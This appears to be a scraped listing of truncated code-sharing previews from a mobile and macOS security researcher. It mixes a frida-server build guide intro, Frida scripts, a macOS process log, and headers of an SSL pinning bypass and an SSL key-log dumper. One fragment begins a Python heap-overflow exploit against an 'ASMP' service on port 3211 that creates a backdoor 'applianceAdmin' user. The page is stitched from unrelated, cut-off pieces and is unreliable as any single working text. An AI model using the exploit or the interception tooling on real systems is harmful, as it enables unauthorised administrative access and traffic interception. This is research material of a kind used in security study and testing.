Here, I'll show you how to compile frida-server
(≥ 16.2.2) for rootfull, rootless and RootHide jailbreaks.
If you want to compile an old version of Frida (< 16.2.2) you can use my old guide.
import socket, struct, sys | |
p32 = lambda x: struct.pack(">I", x) | |
p16 = lambda x: struct.pack(">h", x) | |
p8 = lambda x: struct.pack(">b", x) | |
# ASMP heap overflow exploit creates new applianceAdmin user | |
def exploit(hostname, username="Backdoor", password="Backdoor"): | |
global socks # python closes out of scope sockets | |
port = 3211 # port is hardcoded in the binary | |
usernm = username.encode() |
jevin@wombat [22:32:18] [~/code/mac/widget/xnu_unsuspend] [main *] | |
-> % sudo taskinfo 'Deliveries Widget' | |
process: "Deliveries Widget" [30145] [unique ID: 1220404] | |
architecture: arm64 | |
coalition (type 0) ID: 105936 | |
coalition (type 1) ID: 591 | |
suspend count: 1 | |
virtual bytes: 389.40 GB; phys_footprint bytes: 8.92 MB; phys_footprint lifetime maximum bytes: 8.92 MB | |
run time: 42 s | |
user/system time (current threads): 0.046565 s / 0.036279 s |
// dump classes and selectors forbidden in NSPredicates | |
// `cc -framework Foundation -o restricted restricted.m` | |
#import <Foundation/Foundation.h> | |
#import <dlfcn.h> | |
int main() { | |
void *cf = dlopen("/System/Library/Frameworks/CoreFoundation.framework/CoreFoundation", 0); | |
NSDictionary* (*RestrictedClasses)() = dlsym(cf, "_CFPredicatePolicyRestrictedClasses"); | |
NSDictionary* (*RestrictedSelectors)() = dlsym(cf, "_CFPredicatePolicyRestrictedSelectors"); | |
NSLog(@"Restricted Selectors: %@", RestrictedSelectors()); |
#!/usr/bin/env python3 | |
import json | |
import frida | |
from frida.core import Device, Session, Script, ScriptExportsSync | |
compiler: frida.Compiler = frida.Compiler() | |
compiler.on("diagnostics", lambda diag: print(f"on_diagnostics: {diag}")) | |
bundle: str = compiler.build('permissions.ts', compression='terser') |
import threading | |
from frida_tools.application import Reactor | |
import frida | |
class Application: | |
def __init__(self): | |
self._stop_requested = threading.Event() |
Based on this article https://dev.to/halimsamy/wsl-for-developers-installing-the-android-sdk-53n9
sudo apt-get update
/** | |
* Android, iOS (12.0-15.7.3), Linux universal SSLKEYLOG dumper. | |
* | |
* Usage: | |
* | |
* # For iOS and mac: | |
* rvictl -s [UDID] | |
* # Then open Wireshark and select rvi0 | |
* | |
* # For iOS and not mac: |
const typeMap = { | |
"c": "char", | |
"i": "int", | |
"s": "short", | |
"l": "long", | |
"q": "long long", | |
"C": "unsigned char", | |
"I": "unsigned int", | |
"S": "unsigned short", |
console.log("[*] SSL Pinning Bypasses"); | |
console.log(`[*] Your frida version: ${Frida.version}`); | |
console.log(`[*] Your script runtime: ${Script.runtime}`); | |
/** | |
* by incogbyte | |
* Common functions | |
* thx apkunpacker, NVISOsecurity, TheDauntless | |
* Remember that sslpinning can be custom, and sometimes u need to reversing using ghidra,IDA or something like that. | |
* !!! THIS SCRIPT IS NOT A SILVER BULLET !! |